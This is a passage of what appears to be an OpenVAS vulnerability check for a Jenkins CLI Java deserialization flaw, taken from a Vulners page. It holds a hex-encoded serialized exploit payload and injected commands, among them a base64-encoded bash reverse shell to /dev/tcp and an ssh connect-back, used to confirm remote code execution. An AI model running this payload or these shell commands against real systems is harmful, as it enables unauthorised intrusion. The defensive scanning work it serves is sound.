  0x13, 0x00, 0x00, 0x01, 0x86, 0x71, 0x00, 0x7e, 0x00, 0x2a, 0x71, 0x00, 0x7e, 0x00, 0x2b, 0x74, 0x00, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x73, 0x72, 0x00, 0x26, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x75, 0x74, 0x69, 0x6c,
  0x2e, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x24, 0x55, 0x6e, 0x6d, 0x6f, 0x64, 0x69, 0x66, 0x69, 0x61, 0x62, 0x6c, 0x65, 0x4c, 0x69, 0x73, 0x74, 0xfc, 0x0f, 0x25, 0x31, 0xb5, 0xec,
  0x8e, 0x10, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x71, 0x00, 0x7e, 0x00, 0x0f, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x72, 0x00, 0x2c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x75, 0x74, 0x69,
  0x6c, 0x2e, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x24, 0x55, 0x6e, 0x6d, 0x6f, 0x64, 0x69, 0x66, 0x69, 0x61, 0x62, 0x6c, 0x65, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f,
  0x6e, 0x19, 0x42, 0x00, 0x80, 0xcb, 0x5e, 0xf7, 0x1e, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x01, 0x63, 0x74, 0x00, 0x16, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75, 0x74, 0x69, 0x6c, 0x2f, 0x43, 0x6f, 0x6c, 0x6c, 0x65,
  0x63, 0x74, 0x69, 0x6f, 0x6e, 0x3b, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70, 0x73, 0x72, 0x00, 0x13, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x75, 0x74, 0x69, 0x6c, 0x2e, 0x41, 0x72, 0x72, 0x61, 0x79, 0x4c, 0x69,
  0x73, 0x74, 0x78, 0x81, 0xd2, 0x1d, 0x99, 0xc7, 0x61, 0x9d, 0x03, 0x00, 0x01, 0x49, 0x00, 0x04, 0x73, 0x69, 0x7a, 0x65, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70, 0x00, 0x00, 0x00, 0x00, 0x77, 0x04, 0x00,
  0x00, 0x00, 0x00, 0x78, 0x71, 0x00, 0x7e, 0x00, 0x39, 0x78, 0x71, 0x00, 0x7e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x01, 0x75, 0x72, 0x00, 0x13, 0x5b, 0x4c, 0x6a,
  0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x90, 0xce, 0x58, 0x9f, 0x10, 0x73, 0x29, 0x6c, 0x02, 0x00, 0x00, 0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70,
  0x00, 0x00, 0x00, 0x01, 0x74, 0x00, 0x18, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x63, 0x6c, 0x69, 0x2e, 0x43, 0x6c, 0x69, 0x45, 0x6e, 0x74, 0x72, 0x79, 0x50, 0x6f, 0x69, 0x6e, 0x74, 0x71, 0x00, 0x7e, 0x00,
  0x24, 0x75, 0x72, 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b, 0xad, 0xd2, 0x56, 0xe7, 0xe9, 0x1d, 0x7b, 0x47, 0x02, 0x00, 0x00,
  0x77, 0x04, 0xff, 0xff, 0xff, 0xfd, 0x78, 0x70, 0x00, 0x00, 0x00, 0x01, 0x74, 0x00, 0x10, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x74, 0x00, 0x1d, 0x52,
  0x50, 0x43, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x28, 0x31, 0x2c, 0x77, 0x61, 0x69, 0x74, 0x46, 0x6f, 0x72, 0x50, 0x72, 0x6f, 0x70, 0x65, 0x72, 0x74, 0x79, 0x29 );

if( os_host_runs( "Windows") == "yes" )
  target_runs_windows = TRUE;

foreach connect_back_target( make_list( ownip, ownhostname ) ) {

  # nb: Those doesn't need to be defined within the later foreach cmd() loop...
  vtstrings = get_vt_strings();
  ping_check = vtstrings["ping_string"];
  ping_pattern = hexstr( ping_check );
  # nb: We're currently using 10000-32000 to not get in conflict with the ephemeral port range used
  # by most standard Linux/Unix operating systems. If we're choosing a port of that range we might
  # have false positives due to race conditions (target is sending back a response to a request of
  # another VT for which the scanner had chosen the same source port).
  rnd_port = rand_int_range( min:10000, max:32000 );

  if( target_runs_windows ) {
    cmds = make_list( "ping -n 5 " + connect_back_target );
  }

  else {
    # nb: Initially only ping was used here but some Docker images had shown some strange behavior like e.g.:
    # > ping: Lacking privilege for raw socket.
    # so multiple different commands have been used here for better detection coverage
    cmds = make_list(
      "ping -c 5 -p " + hexstr( ping_check ) + " " + connect_back_target,

      "echo " + base64( str:" >&/dev/tcp/" + connect_back_target + "/" + rnd_port + " 0>&1" ) + " | base64 -d | bash -i",

      "ssh -q -i /dev/null -p " + rnd_port + " " + connect_back_target
    );
  }

  foreach cmd( cmds ) {

    # nb: Always keep open_sock_tcp() after the first call of a function forking on multiple hostnames /
    # vhosts (e.g. http_get(), http_post_put_req(), http_host_name(), get_host_name(), ...). Reason: If
    # the fork would be done after calling open_sock_tcp() the child's would share the same socket
    # causing race conditions and similar.
    #
    # In this case this also includes pcap_src_ip_filter_from_hostnames() from above.
    if( ! soc = open_sock_tcp( port ) )
      continue;

    send( socket:soc, data:headers );
    recv = recv( socket:soc, length:512 );

    if( ! recv || "JENKINS" >!< recv ) {
      close( soc );
      continue;
    }

    ping_used = FALSE;
    tcp_used = FALSE;

    if( "ping -" >< cmd ) {
      filter = string( "icmp and icmp[0] = 8 and ", src_filter, " and ", dst_filter );
      ping_used = TRUE;
    }

    else {
      filter = string( "tcp and dst port ", rnd_port, " and ", src_filter, " and ", dst_filter );
      # nb: We're only interested in TCP SYN packets and want to ignore all others (e.g. ACK, RST, ...)
      filter = string( filter, " and tcp[tcpflags] & (tcp-syn) != 0" );
      tcp_used = TRUE;
    }

    len = raw_string( strlen( cmd ) );

    ex_final = ex_pre + len + cmd + raw_string(
      0x74, 0x00, 0x04, 0x65, 0x78, 0x65, 0x63, 0x75, 0x71, 0x00, 0x7e, 0x00, 0x1e, 0x00, 0x00, 0x00,
      0x01, 0x71, 0x00, 0x7e, 0x00, 0x23, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x11, 0x73, 0x72, 0x00, 0x11,
      0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x49, 0x6e, 0x74, 0x65, 0x67, 0x65,
      0x72, 0x12, 0xe2, 0xa0, 0xa4, 0xf7, 0x81, 0x87, 0x38, 0x02, 0x00, 0x01, 0x49, 0x00, 0x05, 0x76,
      0x61, 0x6c, 0x75, 0x65, 0x78, 0x72, 0x00, 0x10, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e,
      0x67, 0x2e, 0x4e, 0x75, 0x6d, 0x62, 0x65, 0x72, 0x86, 0xac, 0x95, 0x1d, 0x0b, 0x94, 0xe0, 0x8b,
      0x02, 0x00, 0x00, 0x78, 0x70, 0x00, 0x00, 0x00, 0x01, 0x73, 0x72, 0x00, 0x11, 0x6a, 0x61, 0x76,
      0x61, 0x2e, 0x75, 0x74, 0x69, 0x6c, 0x2e, 0x48, 0x61, 0x73, 0x68, 0x4d, 0x61, 0x70, 0x05, 0x07,
      0xda, 0xc1, 0xc3, 0x16, 0x60, 0xd1, 0x03, 0x00, 0x02, 0x46, 0x00, 0x0a, 0x6c, 0x6f, 0x61, 0x64,
      0x46, 0x61, 0x63, 0x74, 0x6f, 0x72, 0x49, 0x00, 0x09, 0x74, 0x68, 0x72, 0x65, 0x73, 0x68, 0x6f,
      0x6c, 0x64, 0x78, 0x70, 0x3f, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x77, 0x08, 0x00, 0x00,
      0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x78, 0x78, 0x76, 0x72, 0x00, 0x12, 0x6a, 0x61, 0x76, 0x61,
      0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x4f, 0x76, 0x65, 0x72, 0x72, 0x69, 0x64, 0x65, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x78, 0x70, 0x71, 0x00, 0x7e, 0x00, 0x3a );

    ex_final = base64( str:ex_final );

    payload_final = payload_pre + ex_final;
    payload_final += payload_post;

    res = send_capture( socket:soc, data:payload_final, timeout:5, pcap_filter:filter );

    close( soc );

    if( ! res )
      continue;

    if( ping_used ) {

      type = get_icmp_element( icmp:res, element:"icmp_type" );
      if( ! type || type != 8 )
        continue;

      # nb: If understanding https://datatracker.ietf.org/doc/html/rfc792 correctly the "data" field
      # should be always there. In addition at least standard Linux and Windows systems are always
      # sending data so it should be safe to check this here.
      if( ! icmp_data = get_icmp_element( icmp:res, element:"data" ) )
        continue;

      # nb:
      # - Like seen on / in e.g.
      #   - https://ilinux.wordpress.com/2018/04/18/%DA%86%D8%B7%D9%88%D8%B1-%D9%88%D9%82%D8%AA%DB%8C-%D9%87%D9%85%D9%87-%DA%86%DB%8C%D8%B2-%D8%A8%D8%B3%D8%AA%D9%87%E2%80%8C%D8%B3%D8%AA-%D8%A8%D9%87-%D8%A7%DB%8C%D9%86%D8%AA%D8%B1%D9%86%D8%AA-%D9%85/
      #   - GS-9790
      # - We can easily rule out this one as not a valid response...
      if( "PING by PRTG" >< icmp_data )
        continue;

      if( ( target_runs_windows || ping_check >< icmp_data ) ) {
        report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host.\n\nReceived answer (ICMP "Data" field):\n\n' + hexdump( ddata:icmp_data );
        security_message( port:port, data:report );
        exit( 0 );
      }
    }

    else {

      tcp_flags = get_tcp_element( tcp:res, element:"th_flags" );
      if( ( tcp_flags & TH_SYN ) ) {
        report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host.\n\nThe TCP-SYN request to port ' + rnd_port + " was then successfully captured.";
        security_message( port:port, data:report );
        exit( 0 );
      }
    }
  }
}

# nb: Don't use exit(99); as we can't be sure that the target isn't affected if e.g. the scanner
# host isn't reachable by the target host or another IP is responding from our request.
exit( 0 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Mar 2026 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 3.19.8
EPSS0.86714
53